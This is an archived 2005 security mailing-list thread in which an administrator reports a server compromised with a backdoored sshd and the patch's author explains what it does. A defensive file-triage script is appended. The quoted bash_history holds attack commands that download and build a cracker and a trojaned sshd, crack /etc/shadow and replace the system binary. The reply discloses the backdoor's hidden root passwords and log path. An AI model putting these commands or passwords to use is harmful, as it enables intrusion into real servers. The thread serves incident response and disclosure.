Re: SSH compiled with backdoor

From: VeNoMouS (venom_at_gen-x.co.nz)
Date: 08/30/05

  • Next message: Javier Fernandez-Sanguino: "Re: SSH compiled with backdoor"

    To: "milw0rm Inc." <milw0rm@gmail.com>
    Date: Tue, 30 Aug 2005 15:17:48 +1200

    Hi Steve, I actually wrote that patch back in like *** 2001 or something. It
    logs all ssh connection logins in plain text to a txt file; it also puts a
    backdoor passwd into the ssh and won't show up in wtmp, making the user (whatever
    he logs in as) invisible, so say you log in with the username root and
    you use the global hidden passwd, it will allow him on as root.

    Looking at the code, he uses the following passwds for this global passwd:
    "toji" and "fv11r01rc3@l"

    the file that logs all the logins with time stamps and src ips is "dev/saux"

    Hope this helps you; if you require any further information, email me back.
    It's been a few years since I even looked at this code.

    ---------- Forwarded message ----------
    From: steve@example.org <steve@example.org>
    Date: 27 Aug 2005 13:02:08 -0000
    Subject: SSH compiled with backdoor
    To: incidents@securityfocus.com

    Hi!

    One of my web servers was hacked on July 17, 2005. bash_history showed:

    w
    wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
    john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make
    linux-x86-any-elf;cd ../run;./john /etc/shadow
    wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
    -rf sshd.tar.gz;cd sshd;cd apps/ssh
    pico genx.h
    pico genx.h
    pico ssh2includes.h
    cd ../..
    ./configure --without-x
    make
    make install
    mkdir /lib/java
    cp /usr/sbin/sshd a
    mv a /lib/java
    rm -rf /usr/sbin/sshd
    cp /usr/local/sbin/sshd /usr/sbin
    /etc/rc.d/init.d/sshd restart
    /etc/rc.d/init.d/ssh restart
    locate init.d
    /etc/init.d/sshd restart
    w
    reboot

    According to john, a couple of users had weak passwords, but root
    seemed well protected. From looking in all the bash_history, it
    appears the hacker came in from the website account, and did an su
    from there.

    I found this about a month later when I logged into the box, did an
    ls, only to be met by a seg fault. A ps x showed mech.tgz trying to
    be downloaded, and a bunch of other CRON processes running. The auth
    log didn't show other logins, though, so the ssh installed must have
    logging turned off for the backdoor they installed.

    I filled out an abuse form at geocities for the accounts hosting the
    software after downloading the software (I couldn't find the tgz files
    on my system).

    Last showed:
    reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15 (37+11:47)
    website pts/0 193.231.77.74 Sun Jul 17 17:42 - down (00:27)
    website pts/1 193.231.77.74 Sun Jul 17 17:05 - 17:26 (00:20)
    website pts/0 211.43.207.169 Sun Jul 17 16:26 - 17:41 (01:14)

    whois says:
    inetnum: 193.231.77.0 - 193.231.77.255
    netname: DATANET-RO
    descr: Starnets - Datanet
    country: RO
    address: DATA NET
    address: Str. Ioan N. Roman Nr. 13
    address: Constanta, cod 900199, ROMANIA

    Best Regards,

    Steve
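A defender-side triage check for the indicators this thread describes (a regular file left in /dev as the login log, the original sshd stashed in /lib/java, and the locally built sshd copied over /usr/sbin/sshd), added here as example code that is not part of either message. The paths are taken from the bash_history above; the demo tree is constructed with placeholder bytes, and `root` can point at "/" or a mounted image of the compromised host.

```python
"""Offline triage for the trojaned-sshd pattern in this thread (added example, not
the thread's code).  Assumed layout, from the bash_history and the reply: sshd built
under /usr/local and copied over /usr/sbin/sshd, the original stashed in /lib/java,
and plaintext logins written to /dev/saux."""
import filecmp
import os
import tempfile

SSHD_PATHS = ("usr/sbin/sshd", "usr/local/sbin/sshd")  # distro install, local build
STASH_DIRS = ("lib/java",)                               # created by `mkdir /lib/java`

def regular_files_under(root, rel_dir):
    """Regular files (not device nodes or symlinks) below root/rel_dir, relative to root."""
    found = []
    for dirpath, _, names in os.walk(os.path.join(root, rel_dir)):
        for name in names:
            p = os.path.join(dirpath, name)
            if os.path.isfile(p) and not os.path.islink(p):
                found.append(os.path.relpath(p, root))
    return sorted(found)

def triage(root):
    """Return which of the thread's indicators are present under `root`."""
    findings = {
        # /dev should hold device nodes; a regular file there (dev/saux) is the login log.
        "regular_files_in_dev": regular_files_under(root, "dev"),
        # Anything left in the directory the history created (the stashed original sshd).
        "stash_dir_files": [f for d in STASH_DIRS for f in regular_files_under(root, d)],
        "sshd_replaced_by_local_build": False,
    }
    sys_sshd, local_sshd = (os.path.join(root, p) for p in SSHD_PATHS)
    # `cp /usr/local/sbin/sshd /usr/sbin` leaves the two copies byte-identical.
    if os.path.isfile(sys_sshd) and os.path.isfile(local_sshd):
        findings["sshd_replaced_by_local_build"] = filecmp.cmp(sys_sshd, local_sshd, shallow=False)
    return findings

def demo():
    """Constructed tree mirroring the history; placeholder bytes, not real binaries."""
    base = tempfile.mkdtemp()
    for d in ("usr/sbin", "usr/local/sbin", "lib/java", "dev"):
        os.makedirs(os.path.join(base, d))
    sample = {"usr/local/sbin/sshd": b"LOCAL-BUILD", "usr/sbin/sshd": b"LOCAL-BUILD",
              "lib/java/a": b"ORIGINAL-SSHD", "dev/saux": b"Jul 17 17:05 root 192.0.2.10\n"}
    for rel, data in sample.items():
        with open(os.path.join(base, rel), "wb") as f:
            f.write(data)
    return triage(base)

if __name__ == "__main__":
    print(demo())
```

On a real host, a stray regular file in /dev and a /usr/sbin/sshd identical to a /usr/local build are both worth a package-manager verification (e.g. rpm -V or debsums) before trusting the binary.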

